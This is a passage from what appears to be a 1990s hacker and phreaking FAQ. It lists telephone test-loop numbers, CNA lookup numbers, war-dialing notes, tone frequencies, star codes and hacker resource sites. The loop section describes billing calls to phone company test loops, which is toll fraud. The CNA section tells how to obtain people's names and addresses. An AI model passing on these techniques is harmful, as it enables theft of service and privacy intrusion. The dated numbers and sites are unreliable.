  3279. 616  946-xxxx         Battle Creek/Grand Rapids/Kalamazoo, MI
  3280. 619  331-xxxx         San Diego, CA
  3281. 619  332-xxxx         San Diego, CA
  3282. 703  958-xxxx         Alexandria/Arlington/Roanoke, VA
  3283. 714  330?             Anaheim, CA (GTE)
  3284. 714  33?-xxxx         Anaheim, CA (PacBell)
  3285. 716  981-xxxx         Rochester, NY (Rochester Tel)
  3286. 719  99x-xxxx         Colorado Springs/Leadville/Pueblo, CO
  3287. 801  938-xxxx         Utah (All)
  3288. 801  939-xxxx         Utah (All)
  3289. 804  260              Charlottesville/Newport News/Norfolk/Richmond, VA
  3290. 805  114              Bakersfield/Santa Barbara, CA
  3291. 805  980-xxxx         Bakersfield/Santa Barbara, CA
  3292. 810  951-xxx-xxxx     Pontiac/Southfield/Troy, MI
  3293. 813  711              Ft. Meyers/St. Petersburg/Tampa, FL
  3294. 817  971              Ft. Worth/Waco, TX  (Press 2#)
  3295. 906  951-xxx-xxxx     Marquette/Sault Ste. Marie, MI
  3296. 908  55?-xxxx         New Brunswick, NJ
  3297. 908  953              New Brunswick, NJ
  3298. 914  660-xxxx         Peekskill/Poughkeepsie/White Plains/Yonkers, NY
  3299.  
  3300. Canada:
  3301. 416  57x-xxxx         Toronto, Ontario
  3302. 416  99x-xxxx         Toronto, Ontario
  3303. 416  999-xxx-xxxx     Toronto, Ontario
  3304. 514  320-xxx-xxxx     Montreal, Quebec
  3305. 613  999-xxx-xxxx     Ottawa, Ontario
  3306. 705  999-xxx-xxxx     North Bay/Saulte Ste. Marie, Ontario
  3307.  
  3308. Australia: +61 199
  3309. Brazil: 199
  3310. New Zealand: 137
  3311. Sweden: 0058
  3312. United Kingdom: 174 or 1744 or 175
  3313.  
  3314.  
  3315. 14. What is a loop?
  3316.  
  3317. This FAQ answer is excerpted from: ToneLoc v0.99 User Manual
  3318.                    by Minor Threat & Mucho Maas
  3319.  
  3320. Loops are a pair of phone numbers, usually consecutive, like 836-9998
  3321. and 836-9999.  They are used by the phone company for testing.  What
  3322. good do loops do us?  Well, they are cool in a few ways.  Here is a
  3323. simple use of loops.  Each loop has two ends, a 'high' end, and a
  3324. 'low' end.  One end gives a (usually) constant, loud tone when it is
  3325. called. The other end is silent.  Loops don't usually ring either.
  3326. When BOTH ends are called, the people that called each end can talk
  3327. through the loop.  Some loops are voice filtered and won't pass
  3328. anything but a constant tone; these aren't much use to you.  Here's
  3329. what you can use working loops for:  billing phone calls!  First, call
  3330. the end that gives the loud tone.  Then if the operator or someone
  3331. calls the other end, the tone will go quiet.  Act like the phone just
  3332. rang and you answered it ... say "Hello", "Allo", "Chow", "Yo", or
  3333. what the fuck ever.  The operator thinks that she just called you, and
  3334. that's it!  Now the phone bill will go to the loop, and your local
  3335. RBOC will get the bill!  Use this technique in moderation, or the loop
  3336. may go down.  Loops are probably most useful when you want to talk to
  3337. someone to whom you don't want to give your phone number.
  3338.  
  3339.  
  3340. 15. What is a loop in my area?
  3341.  
  3342. Many of these loops are no longer functional.  If you are local
  3343. to any of these loops, please try them out an e-mail me the results
  3344. of your research.
  3345.  
  3346. NPA    High      Low
  3347. ---  --------  --------
  3348. 201  228-9929  228-9930
  3349. 201  238-9929  238-9930
  3350. 201  251-9929  251-9930
  3351. 201  254-9929  254-9930
  3352. 201  272-9929  272-9930
  3353. 201  330-9929  330-9930
  3354. 201  333-9929  333-9930
  3355. 201  339-9929  339-9930
  3356. 201  347-9929  347-9930
  3357. 201  376-9929  376-9930
  3358. 201  398-9929  398-9930
  3359. 201  467-9929  467-9930
  3360. 201  528-9929  528-9930
  3361. 201  531-9929  531-9930
  3362. 201  558-9929  558-9930
  3363. 201  559-9929  559-9930
  3364. 201  560-9929  560-9930
  3365. 201  592-9929  592-9930
  3366. 201  625-9929  625-9930
  3367. 201  631-9929  631-9930
  3368. 201  637-9929  637-9930
  3369. 201  655-9929  655-9930
  3370. 201  666-9929  666-9930
  3371. 201  690-9929  690-9930
  3372. 201  761-9929  761-9930
  3373. 201  762-9929  762-9929
  3374. 201  762-9929  762-9930
  3375. 201  763-9929  763-9930
  3376. 201  764-9929  764-9930
  3377. 201  767-9929  767-9930
  3378. 201  768-9929  768-9930
  3379. 201  773-9929  773-9930
  3380. 201  879-9929  879-9930
  3381. 201  938-9929  938-9930
  3382. 201  946-9929  946-9930
  3383. 201  992-9929  992-9930
  3384. 201  993-9929  993-9930
  3385. 201  994-9929  994-9930
  3386. 206  827-0018  827-0019
  3387. 206  988-0020  988-0022
  3388. 208  862-9996  862-9997
  3389. 209  732-0044  732-0045
  3390. 212  220-9977  220-9979
  3391. 212  283-9977  283-9979
  3392. 212  283-9977  283-9997
  3393. 212  352-9900  352-9906
  3394. 212  365-9977  365-9979
  3395. 212  529-9900  529-9906
  3396. 212  562-9977  562-9979
  3397. 212  986-9977  986-9979
  3398. 213  360-1118  360-1119
  3399. 213  365-1118  365-1119
  3400. 213  455-0002  455-XXXX
  3401. 213  455-0002  455-xxxx
  3402. 213  546-0002  546-XXXX
  3403. 213  546-0002  546-xxxx
  3404. 213  549-1118  549-1119
  3405. 214  291-4759  291-4757
  3406. 214  299-4759  299-4757
  3407. 305  778-9952  778-9951
  3408. 305  964-9951  964-9952
  3409. 307  468-9999  468-9998
  3410. 308  357-0004  357-0005
  3411. 312  222-9973  222-9974
  3412. 312  234-9973  234-9974
  3413. 313  224-9996  224-9997
  3414. 313  225-9996  225-9997
  3415. 313  234-9996  234-9997
  3416. 313  237-9996  237-9997
  3417. 313  256-9996  256-9997
  3418. 313  272-9996  272-9997
  3419. 313  273-9996  273-9997
  3420. 313  277-9996  277-9997
  3421. 313  281-9996  281-9997
  3422. 313  292-9996  292-9997
  3423. 313  299-9996  299-9997
  3424. 313  321-9996  321-9997
  3425. 313  326-9996  326-9997
  3426. 313  356-9996  356-9997
  3427. 313  362-9996  362-9997
  3428. 313  369-9996  369-9997
  3429. 313  388-9996  388-9997
  3430. 313  397-9996  397-9997
  3431. 313  399-9996  399-9997
  3432. 313  445-9996  445-9997
  3433. 313  465-9996  465-9997
  3434. 313  471-9996  471-9997
  3435. 313  474-9996  474-9997
  3436. 313  477-9996  477-9997
  3437. 313  478-9996  478-9997
  3438. 313  483-9996  483-9997
  3439. 313  497-9996  497-9997
  3440. 313  526-9996  526-9997
  3441. 313  552-9996  552-9997
  3442. 313  556-9996  556-9997
  3443. 313  561-9996  561-9997
  3444. 313  569-9996  569-9996
  3445. 313  575-9996  575-9997
  3446. 313  577-9996  577-9997
  3447. 313  585-9996  585-9997
  3448. 313  591-9996  591-9997
  3449. 313  621-9996  621-9997
  3450. 313  626-9996  626-9997
  3451. 313  644-9996  644-9997
  3452. 313  646-9996  646-9997
  3453. 313  647-9996  647-9997
  3454. 313  649-9996  649-9997
  3455. 313  663-9996  663-9997
  3456. 313  665-9996  665-9997
  3457. 313  683-9996  683-9997
  3458. 313  721-9996  721-9997
  3459. 313  722-9996  722-9997
  3460. 313  728-9996  728-9997
  3461. 313  731-9996  731-9997
  3462. 313  751-9996  751-9997
  3463. 313  776-9996  776-9997
  3464. 313  781-9996  781-9997
  3465. 313  787-9996  787-9997
  3466. 313  822-9996  822-9997
  3467. 313  833-9996  833-9997
  3468. 313  851-9996  851-9997
  3469. 313  871-9996  871-9997
  3470. 313  875-9996  875-9997
  3471. 313  886-9996  886-9997
  3472. 313  888-9996  888-9997
  3473. 313  898-9996  898-9997
  3474. 313  934-9996  934-9997
  3475. 313  942-9996  942-9997
  3476. 313  963-9996  963-9997
  3477. 313  977-9996  977-9997
  3478. 315  673-9995  673-9996
  3479. 315  695-9995  695-9996
  3480. 402  422-0001  422-0002
  3481. 402  422-0003  422-0004
  3482. 402  422-0005  422-0006
  3483. 402  422-0007  422-0008
  3484. 402  572-0003  572-0004
  3485. 402  779-0004  779-0007
  3486. 406  225-9902  225-9903
  3487. 517  422-9996  422-9997
  3488. 517  423-9996  423-9997
  3489. 517  455-9996  455-9997
  3490. 517  563-9996  563-9997
  3491. 517  663-9996  663-9997
  3492. 517  851-9996  851-9997
  3493. 609  921-9929  921-9930
  3494. 609  994-9929  994-9930
  3495. 616  997-9996  997-9997
  3496. 713  224-1499  759-1799
  3497. 713  324-1499  324-1799
  3498. 713  342-1499  342-1799
  3499. 713  351-1499  351-1799
  3500. 713  354-1499  354-1799
  3501. 713  356-1499  356-1799
  3502. 713  442-1499  442-1799
  3503. 713  447-1499  447-1799
  3504. 713  455-1499  455-1799
  3505. 713  458-1499  458-1799
  3506. 713  462-1499  462-1799
  3507. 713  466-1499  466-1799
  3508. 713  468-1499  468-1799
  3509. 713  469-1499  469-1799
  3510. 713  471-1499  471-1799
  3511. 713  481-1499  481-1799
  3512. 713  482-1499  482-1799
  3513. 713  484-1499  484-1799
  3514. 713  487-1499  487-1799
  3515. 713  489-1499  489-1799
  3516. 713  492-1499  492-1799
  3517. 713  493-1499  493-1799
  3518. 713  524-1499  524-1799
  3519. 713  526-1499  526-1799
  3520. 713  555-1499  555-1799
  3521. 713  661-1499  661-1799
  3522. 713  664-1499  664-1799
  3523. 713  665-1499  665-1799
  3524. 713  666-1499  666-1799
  3525. 713  667-1499  667-1799
  3526. 713  682-1499  976-1799
  3527. 713  771-1499  771-1799
  3528. 713  780-1499  780-1799
  3529. 713  781-1499  997-1799
  3530. 713  960-1499  960-1799
  3531. 713  977-1499  977-1799
  3532. 713  988-1499  988-1799
  3533. 805  528-0044  528-0045
  3534. 805  544-0044  544-0045
  3535. 805  773-0044  773-0045
  3536. 808  235-9907  235-9908
  3537. 808  239-9907  239-9908
  3538. 808  245-9907  245-9908
  3539. 808  247-9907  247-9908
  3540. 808  261-9907  261-9908
  3541. 808  322-9907  322-9908
  3542. 808  328-9907  328-9908
  3543. 808  329-9907  329-9908
  3544. 808  332-9907  332-9908
  3545. 808  335-9907  335-9908
  3546. 808  572-9907  572-9908
  3547. 808  623-9907  623-9908
  3548. 808  624-9907  624-9908
  3549. 808  668-9907  668-9908
  3550. 808  742-9907  742-9908
  3551. 808  879-9907  879-9908
  3552. 808  882-9907  882-9908
  3553. 808  885-9907  885-9908
  3554. 808  959-9907  959-9908
  3555. 808  961-9907  961-9908
  3556. 813  385-9971
  3557. 908  776-9930  776-9930
  3558.  
  3559.  
  3560. 16. What is a CNA number?
  3561.  
  3562. CNA stands for Customer Name and Address.  The CNA number is a phone
  3563. number for telephone company personnel to call and get the name and
  3564. address for a phone number.  If a telephone lineman finds a phone line
  3565. he does not recognize, he can use the ANI number to find it's phone
  3566. number and then call the CNA operator to see who owns it and where
  3567. they live.
  3568.  
  3569. Normal CNA numbers are available only to telephone company personnel.
  3570. Private citizens may legally get CNA information from private
  3571. companies.  Two such companies are:
  3572.  
  3573. Unidirectory    (900)933-3330
  3574. Telename        (900)884-1212
  3575.  
  3576. Note that these are 900 numbers, and will cost you approximately one
  3577. dollar per minute.
  3578.  
  3579. If you are in 312 or 708, AmeriTech has a pay-for-play CNA service
  3580. available to the general public.  The number is 796-9600.  The cost is
  3581. $.35/call and can look up two numbers per call.
  3582.  
  3583. An interesting number is The House of Windsor Collection at
  3584. (800)433-3210.  If you dial it and press 1 to request a catalog, it
  3585. will ask for your telephone number.  If will then tell you the street
  3586. name of any telephone number you enter.
  3587.  
  3588.  
  3589. 17. What is the telephone company CNA number for my area?
  3590.  
  3591. 203  203-771-8080     CT (All)
  3592. 516  516-321-5700     Hempstead/Long Island, NY
  3593. 614  614-464-0123     Columbus/Steubenville, OH
  3594. 813  813-270-8711     Ft. Meyers/St. Petersburg/Tampa, FL
  3595. 513  513-397-9110     Cincinnati/Dayton, OH
  3596.  
  3597.  
  3598. 18. What are some numbers that always ring busy?
  3599.  
  3600. 216  xxx-9887              Akron/Canton/Cleveland/Lorain/Youngstown, OH
  3601. 316  952-7265              Dodge City/Wichita, KS
  3602. 501  377-99xx              AR (All)
  3603. 719  472-3773              Colorado Springs/Leadville/Pueblo, CO
  3604. 719  577-6100 to 577-6200  Colorado Springs/Leadville/Pueblo, CO
  3605. 818  885-0699              Pasadena, CA
  3606. 906  632-9999              Marquette/Sault Ste. Marie, MI
  3607. 906  635-9999              Marquette/Sault Ste. Marie, MI
  3608. 914  576-9903              Peekskill/Poughkeepsie/White Plains/Yonkers, NY
  3609.  
  3610.  
  3611. 19. What are some numbers that temporarily disconnect phone service?
  3612.  
  3613. 314  511        Columbia/Jefferson City/St.Louis, MO (1 minute)
  3614. 404  420        Atlanta, GA                          (5 minutes)
  3615. 405  953        Enid/Oklahoma City, OK               (1 minute)
  3616. 407  511        Orlando/West Palm Beach, FL          (1 minute)
  3617. 512  200        Austin/Corpus Christi, TX            (1 minute)
  3618. 516  480        Hempstead/Long Island, NY            (1 minute)
  3619. 603  980        NH (All)
  3620. 512  200        Austin/Corpus Christi, TX            (1 minute)
  3621. 919  211 or 511 Durham, NC                           (10 min - 1 hour)
  3622.  
  3623.  
  3624. 20. What is scanning?
  3625.  
  3626. Scanning is dialing a large number of telephone numbers in the hope
  3627. of finding interesting carriers (computers) or tones.
  3628.  
  3629. Scanning can be done by hand, although dialing several thousand
  3630. telephone numbers by hand is extremely boring and takes a long time.
  3631.  
  3632. Much better is to use a scanning program, sometimes called a war
  3633. dialer or a demon dialer.  Currently, the best war dialer available
  3634. to PC-DOS users is ToneLoc from Minor Threat and Mucho Maas.
  3635.  
  3636. A war dialer will dial a range of numbers and log what it finds at
  3637. each number.  You can then only dial up the numbers that the war
  3638. dialer marked as carriers or tones.
  3639.  
  3640.  
  3641. 21. Is scanning illegal?
  3642.  
  3643. Excerpt from: 2600, Spring 1990, Page 27:
  3644.  
  3645. -BQ-
  3646. In some places, scanning has been made illegal.  It would be hard,
  3647. though, for someone to file a complaint against you for scanning since
  3648. the whole purpose is to call every number once and only once.  It's
  3649. not likely to be thought of as harassment by anyone who gets a single
  3650. phone call from a scanning computer.  Some central offices have been
  3651. known to react strangely when people start scanning.  Sometimes you're
  3652. unable to get a dialtone for hours after you start scanning.  But
  3653. there is no uniform policy.  The best thing to do is to first find out
  3654. if you've got some crazy law saying you can't do it.  If, as is
  3655. likely, there is no such law, the only way to find out what happens is
  3656. to give it a try.
  3657. -EQ-
  3658.  
  3659. It should be noted that a law making scanning illegal was recently
  3660. passed in Colorado Springs, CO.  It is now illegal to place a call
  3661. in Colorado Springs without the intent to communicate.
  3662.  
  3663.  
  3664. 22. Where can I purchase a lineman's handset?
  3665.  
  3666. Contact East
  3667. 335 Willow Street
  3668. North Andover, MA 01845-5995
  3669. (508)682-2000
  3670.  
  3671. Jensen Tools
  3672. 7815 S. 46th Street
  3673. Phoenix, AZ 85044-5399
  3674.  
  3675. Time Motion Tools
  3676. 12778 Brookprinter Place
  3677. Poway, CA 92064
  3678. (619)679-0303
  3679.  
  3680.  
  3681. 23. What are the DTMF frequencies?
  3682.  
  3683. DTMF stands for Dual Tone Multi Frequency.  These are the tones you
  3684. get when you press a key on your telephone touchpad.  The tone of the
  3685. button is the sum of the column and row tones.  The ABCD keys do not
  3686. exist on standard telephones.
  3687.  
  3688.      1209 1336 1477 1633
  3689.  
  3690.      697   1    2    3    A
  3691.  
  3692.      770   4    5    6    B
  3693.  
  3694.      852   7    8    9    C
  3695.  
  3696.      941   *    0    #    D
  3697.  
  3698.  
  3699. 24. What are the frequencies of the telephone tones?
  3700.  
  3701. Type                Hz          On      Off
  3702. ---------------------------------------------------------------------
  3703. Dial Tone         350 & 400     ---     ---
  3704. Busy Signal       480 & 620     0.5     0.5
  3705. Toll Congestion   480 & 620     0.2     0.3
  3706. Ringback (Normal) 440 & 480     2.0     4.0
  3707. Ringback (PBX)    440 & 480     1.5     4.5
  3708. Reorder (Local)   480 & 620     3.0     2.0
  3709. Invalid Number    200 & 400
  3710. Hang Up Warning 1400 & 2060     0.1     0.1
  3711. Hang Up         2450 & 2600     ---     ---
  3712.  
  3713.  
  3714. 25. What are all of the * codes?
  3715.  
  3716. Local Area Signalling Services (LASS) and Custom Calling Feature
  3717. Control Codes:
  3718.  
  3719. (These appear to be standard, but may be changed locally)
  3720.  
  3721. Service                     Tone    Pulse/rotary   Notes
  3722. --------------------------------------------------------------------------
  3723. Assistance/Police           *12         n/a        [1]
  3724. Cancel forwarding           *30         n/a        [C1]
  3725. Automatic Forwarding        *31         n/a        [C1]
  3726. Notify                      *32         n/a        [C1] [2]
  3727. Intercom Ring 1 (..)        *51         1151       [3]
  3728. Intercom Ring 2 (.._)       *52         1152       [3]
  3729. Intercom Ring 3 (._.)       *53         1153       [3]
  3730. Extension Hold              *54         1154       [3]
  3731. Customer Originated Trace   *57         1157
  3732. Selective Call Rejection    *60         1160       (or Call Screen)
  3733. Selective Distinct Alert    *61         1161
  3734. Selective Call Acceptance   *62         1162
  3735. Selective Call Forwarding   *63         1163
  3736. ICLID Activation            *65         1165
  3737. Call Return (outgoing)      *66         1166
  3738. Number Display Blocking     *67         1167       [4]
  3739. Computer Access Restriction *68         1168
  3740. Call Return (incoming)      *69         1169
  3741. Call Waiting disable        *70         1170       [4]
  3742. No Answer Call Transfer     *71         1171
  3743. Usage Sensitive 3 way call  *71         1171
  3744. Call Forwarding: start      *72 or 72#  1172
  3745. Call Forwarding: cancel     *73 or 73#  1173
  3746. Speed Calling (8 numbers)   *74 or 74#  1174
  3747. Speed Calling (30 numbers)  *75 or 75#  1175
  3748. Anonymous Call Rejection    *77         1177       [5] [M: *58]
  3749. Call Screen Disable         *80         1160       (or Call Screen) [M: *50]
  3750. Selective Distinct Disable  *81         1161       [M: *51]
  3751. Select. Acceptance Disable  *82         1162
  3752. Select. Forwarding Disable  *83         1163       [M: *53]
  3753. ICLID Disable               *85         1165
  3754. Call Return (cancel out)    *86         1186       [6] [M: *56]
  3755. Anon. Call Reject (cancel)  *87         1187       [5] [M: *68]
  3756. Call Return (cancel in)     *89         1189       [6] [M: *59]
  3757.  
  3758. Notes:
  3759.  
  3760. [C1]     - Means code used for Cellular One service
  3761. [1]      - for cellular in Pittsburgh, PA A/C 412 in some areas
  3762. [2]      - indicates that you are not local and maybe how to reach you
  3763. [3]      - found in Pac Bell territory; Intercom ring causes a distinctive
  3764.            ring to be generated on the current line; Hold keeps a call
  3765.            connected until another extension is picked up
  3766. [4]      - applied once before each call
  3767. [5]      - A.C.R. blocks calls from those who blocked Caller ID
  3768.            (used in C&P territory, for instance)
  3769. [6]      - cancels further return attempts
  3770. [M: *xx] - alternate code used for MLVP (multi-line variety package)
  3771.            by Bellcore. It goes by different names in different RBOCs.
  3772.            In Bellsouth it is called Prestige. It is an arrangement of
  3773.            ESSEX like features for single or small multiple line groups.
  3774.  
  3775.            The reason for different codes for some features in MLVP is that
  3776.            call-pickup is *8 in MLVP so all *8x codes are reaasigned *5x
  3777.  
  3778.  
  3779. 26. What frequencies do cordless phones operate on?
  3780.  
  3781. Here are the frequencies for the first generation 46/49mhz phones.
  3782. The new 900mhz cordless phones are not covered.
  3783.  
  3784. Channel    Handset Transmit    Base Transmit
  3785. -------    ----------------    -------------
  3786.    1          49.670mhz          46.610mhz
  3787.    2          49.845             46.630
  3788.    3          49.860             46.670
  3789.    4          49.770             46.710
  3790.    5          49.875             46.730
  3791.    6          49.830             46.770
  3792.    7          49.890             46.830
  3793.    8          49.930             46.870
  3794.    9          49.990             46.930
  3795.   10          49.970             46.970
  3796.  
  3797.  
  3798.  
  3799.  
  3800. Section C: Resources
  3801. ~~~~~~~~~~~~~~~~~~~~
  3802.  
  3803. 01. What are some ftp sites of interest to hackers?
  3804.  
  3805. alex.sp.cs.cmu.edu      /links/security                 (Misc)
  3806. aql.gatech.edu                                          (40Hex)
  3807. athena-dist.mit.edu     /pub/ATHENA                     (Athena Project)
  3808. bellcore.com                                            (Bellcore)
  3809. camelot.usc.edu         /pub/cellular/DDIinfodemo       (Cellular)
  3810. cert.org                                                (CERT)
  3811. coast.cs.purdue.edu     /pub                            (Security)
  3812. coast.cs.purdue.edu     /pub                            (Coast)
  3813. cs.columbia.edu         /archives/mirror2/world-info/obi/Phracks
  3814. crimelab.com                                            (Crimelab)
  3815. dartmouth.edu           /pub/security                   (Security)
  3816. fc.net                  /pub/defcon                     (DefCon)
  3817. freeside.com                                            (Phrack)
  3818. lod.amaranth.com                                        (Legion of Doom)
  3819. ftp.apple.com           /pub/stud_reps/phrack           (Zines)
  3820. ftp.3com.com            /Orange-Book                    (Orange Book)
  3821. ftp.3com.com            /mirrors/zip                    (ZipCrypt)
  3822. ftp.IEunet.ie           /pub/security                   (Security)
  3823. ftp.armory.com          /pub/user/kmartind              (H/P)
  3824. ftp.cert.org            /pub                            (CERT)
  3825. ftp.cic.net             /pub/e-serials/alphabetic/p/phrack (Zines)
  3826. ftp.clark.net           /pub/jcase                      (H/P)
  3827. ftp.commerce.net        /pubs/standards/drafts/shttp.txt(Secure HyperText)
  3828. ftp.cs.uwm.edu          /pub/comp-privacy               (Comp. Privacy Digest)
  3829. ftp.csl.sri.com         /pub/nides                      (SRI)
  3830. ftp.csua.berkeley.edu   /pub/cypherpunks                (Crypto)
  3831. ftp.eff.org             /pub/cud                        (EFF)
  3832. ftp.elelab.nsc.co.jp    /pub/security                   (Security)
  3833. ftp.etext.org                                           (Etext)
  3834. ftp.fc.net
  3835. ftp.fh-berlin.de                                        (Wordlists)
  3836. ftp.greatcircle.com     /pub/firewalls                  (Firewalls)
  3837. ftp.halcyon.com         /pub/cud                        (Zines)
  3838. ftp.inoc.dl.nec.com     /pub/security                   (Security)
  3839. ftp.mcs.com             /mcsnet.users/crisadm/stuff/research/samples (Virii)
  3840. ftp.near.net            /security/archives/phrack       (Zines)
  3841. ftp.netcom.com          /pub/br/bradleym                (Virii)
  3842. ftp.netcom.com          /pub/va/vandal                  (DnA)
  3843. ftp.netcom.com          /pub/vo/vortex                  (Phiber-Scream)
  3844. ftp.netcom.com          /pub/zz/zzyzx                   (H/P)
  3845. ftp.ocs.mq.edu.au       /PC/Crypt                       (Crypto)
  3846. ftp.paranoia.com        /pub/toneloc/tl110.zip          (ToneLoc)
  3847. ftp.primus.com          /pub/armchair                   (Phoney)
  3848. ftp.primus.com          /pub/security                   (Security)
  3849. ftp.rahul.net           /pub/lps                        (Home of the FAQ)
  3850. ftp.std.com             /archives/alt.locksmithing      (Locksmithing)
  3851. ftp.std.com             /obi/Mischief/                  (MIT Guide to Lock...)
  3852. ftp.std.com             /obi/Phracks                    (Zines)
  3853. ftp.sunet.se            /pub/network/monitoring         (Ethernet sniffers)
  3854. ftp.sura.net            /pub/security                   (SURAnet)
  3855. ftp.tis.com             /pub                            (TIS)
  3856. ftp.uu.net              /doc/literary/obi/Phracks       (Zines)
  3857. ftp.warwick.ac.uk       /pub/cud                        (Zines)
  3858. ftp.win.tue.nl          /pub/security                   (Security)
  3859. ftp.winternet.com       /users/craigb                   (H/P)
  3860. ftp.wustl.edu           /doc/EFF                        (EFF)
  3861. furmint.nectar.cs.cmu.edu /security                     (Crypto)
  3862. garbo.uwasa.fi          /pc/crypt                       (Crypto)
  3863. irbis.llnl.gov          /pub                            (CIAC)
  3864. lcs.mit.edu             /telecom-archives               (Telecom archives)
  3865. mary.iia.org            /pub/users/patriot              (Misc)
  3866. net.tamu.edu            /pub/security/TAMU              (Security)
  3867. net23.com               /pub                            (Max Headroom)
  3868. nic.ddn.mil             /scc                            (DDN Security)
  3869. nic.funet.fi            /pub/doc/cud                    (Zines)
  3870. paradox1.denver.colorado.edu  /anonymous/text-files/pyrotechnics (Pyro)
  3871. pyrite.rutgers.edu      /pub/security                   (Security)
  3872. relay.cs.toronto.edu    /doc/telecom-archives           (Telecom)
  3873. rena.dit.co.jp          /pub/security                   (Security)
  3874. research.att.com        /dist/internet_security         (AT&T)
  3875. ripem.msu.edu           /pub/crypt                      (Ripem)
  3876. rs1.rrz.uni-koeln.de                                    (Wordlists)
  3877. rtfm.mit.edu                                            (Etext)
  3878. rtfm.mit.edu            /pub/usenet-by-group            (Usenet FAQ's)
  3879. sable.ox.ac.uk                                          (Wordlists)
  3880. scss3.cl.msu.edu        /pub/crypt                      (Crypto)
  3881. sekurity.com                                            (TNO)
  3882. spy.org                                                 (CSC)
  3883. suburbia.apana.org.au   /pub/unix/security              (Security)
  3884. theta.iis.u-tokyo.ac.jp /pub1/security                  (Security)
  3885. titania.mathematik.uni-ulm.de /pub/security             (Security)
  3886. uceng.uc.edu            /pub/kerberos.documentation     (Kerberos)
  3887. wimsey.bc.ca            /pub/crypto                     (Crypto)
  3888.  
  3889.  
  3890. 02. What are some newsgroups of interest to hackers?
  3891.  
  3892. alt.2600                Do it 'til it hertz
  3893. alt.2600.hope.tech      Technology concerns for Hackers on Planet Earth 1994
  3894. alt.cellular
  3895. alt.cyberpunk           High-tech low-life.
  3896. alt.cyberspace          Cyberspace and how it should work.
  3897. alt.dcom.telecom        Discussion of telecommunications technology
  3898. alt.engr.explosives     [no description available]
  3899. alt.hackers             Descriptions of projects currently under development
  3900. alt.locksmithing        You locked your keys in *where*?
  3901. alt.hackers.malicious   The really bad guys - don't take candy from them
  3902. alt.privacy.anon-server Technical & policy matters of anonymous contact servers
  3903. alt.radio.pirate        Hide the gear, here comes the magic station-wagons.
  3904. alt.radio.scanner       Discussion of scanning radio receivers.
  3905. alt.security            Security issues on computer systems
  3906. alt.security.index      Pointers to good stuff in misc.security (Moderated)
  3907. alt.security.keydist    Exchange of keys for public key encryption systems
  3908. alt.security.pgp        The Pretty Good Privacy package
  3909. alt.security.ripem      A secure email system illegal to export from the US
  3910. comp.dcom.cellular      [no description available]
  3911. comp.dcom.telecom       Telecommunications digest (Moderated)
  3912. comp.dcom.telecom.tech  [no description available]
  3913. comp.org.cpsr.announce  Computer Professionals for Social Responsibility
  3914. comp.org.cpsr.talk      Issues of computing and social responsibility
  3915. comp.org.eff.news       News from the Electronic Frontiers Foundation
  3916. comp.org.eff.talk       Discussion of EFF goals, strategies, etc.
  3917. comp.protocols.kerberos The Kerberos authentification server
  3918. comp.protocols.tcp-ip   TCP and IP network protocols
  3919. comp.risks              Risks to the public from computers & users
  3920. comp.security.announce  Announcements from the CERT about security
  3921. comp.security.misc      Security issues of computers and networks
  3922. comp.security.unix      Discussion of Unix security
  3923. comp.virus              Computer viruses & security (Moderated)
  3924. de.org.ccc              Mitteilungen des CCC e.V.
  3925. misc.security           Security in general, not just computers (Moderated)
  3926. rec.pyrotechnics        Fireworks, rocketry, safety, & other topics
  3927. rec.radio.scanner       [no description available]
  3928. rec.video.cable-tv      Technical and regulatory issues of cable television.
  3929. sci.crypt               Different methods of data en/decryption
  3930.  
  3931.  
  3932. 03. What are some telnet sites of interest to hackers?
  3933.  
  3934. ntiabbs.ntia.doc.gov            (NTIA)
  3935. telnet lust.isca.uiowa 2600     (underground bbs)
  3936.  
  3937.  
  3938. 04. What are some gopher sites of interest to hackers?
  3939.  
  3940. ba.com                  (Bell Atlantic)
  3941. csrc.ncsl.nist.gov      (NIST Security Gopher)
  3942. gopher.acm.org          (SIGSAC (Security, Audit & Control))
  3943. gopher.cpsr.org         (Computer Professionals for Social Responsibility)
  3944. gopher.cs.uwm.edu
  3945. gopher.eff.org          (Electonic Frontier Foundation)
  3946. gopher.wired.com        (Wired Magazine)
  3947. gw.PacBell.com          (Pacific Bell)
  3948. iitf.doc.gov            (NITA -- IITF)
  3949. oss.net                 (Open Source Solutions)
  3950. spy.org                 (Computer Systems Consulting)
  3951. wiretap.spies.com       (Wiretap)
  3952.  
  3953.  
  3954. 05. What are some World wide Web (WWW) sites of interest to hackers?
  3955.  
  3956. http://aset.rsoc.rockwell.com                   (NASA/MOD AIS Security)
  3957. http://aset.rsoc.rockwell.com/exhibit.html(Technology for Information Security)
  3958. http://ausg.dartmouth.edu/security.html         (Security)
  3959. http://crimelab.com/bugtraq/bugtraq.html        (Bugtraq)
  3960. http://cs.purdue.edu/coast/coast.html           (Coast)
  3961. http://csrc.ncsl.nist.gov                       (NIST)
  3962. http://dans.dorm.umd.edu/~deker
  3963. http://dfw.net/~aleph1
  3964. http://draco.centerline.com:8080/~franl/crypto.html (Crypto)
  3965. http://everest.cs.ucdavis.edu/Security.html     (Security)
  3966. http://everest.cs.ucdavis.edu/slides/slides.html(Security Lab Slides)
  3967. http://ezinfo.ethz.ch/ETH/D-REOK/fsk/fsk_homepage.html  (CSSCR)
  3968. http://first.org                                (FIRST)
  3969. http://ftp.tamu.edu/~abr8030/security.html      (Security)
  3970. http://hightop.nrl.navy.mil/potpourri.html      (Security)
  3971. http://hightop.nrl.navy.mil/rainbow.html        (Rainbow Books)
  3972. http://info.bellcore.com/BETSI/betsi.html       (Betsi)
  3973. http://infosec.nosc.mil/infosec.html            (SPAWAR INFOSEC)
  3974. http://l0pht.com                                (The l0pht)
  3975. http://mls.saic.com                             (SAIC MLS)
  3976. http://naic.nasa.gov/fbi/FBI_homepage.html      (FBI Homepage)
  3977. http://nasirc.hq.nasa.gov                       (NASA ASIRC)
  3978. http://ophie.hughes.american.edu/~ophie
  3979. http://tansu.com.au/Info/security.html          (Computer and Network Security)
  3980. http://the-tech.mit.edu                         (LaMacchia case info)
  3981. http://wintermute.itd.nrl.navy.mil/5544.html    (Network Security)
  3982. http://www.aads.net                             (Ameritech)
  3983. http://www.achilles.net/~pluvius
  3984. http://www.alw.nih.gov/WWW/security.html        (Unix Security)
  3985. http://www.artcom.de/CCC                        (CCC Homepage)
  3986. http://www.ba.com                               (Bell Atlantic)
  3987. http://www.beckman.uiuc.edu/groups/biss/VirtualLibrary/xsecurity.html(X-Win)
  3988. http://www.bell.com                             (MFJ Task Force)
  3989. http://www.bellcore.com/SECURITY/security.html  (Bellcore Security Products)
  3990. http://www.brad.ac.uk/~nasmith/index.html
  3991. http://www.bst.bls.com                          (BellSouth)
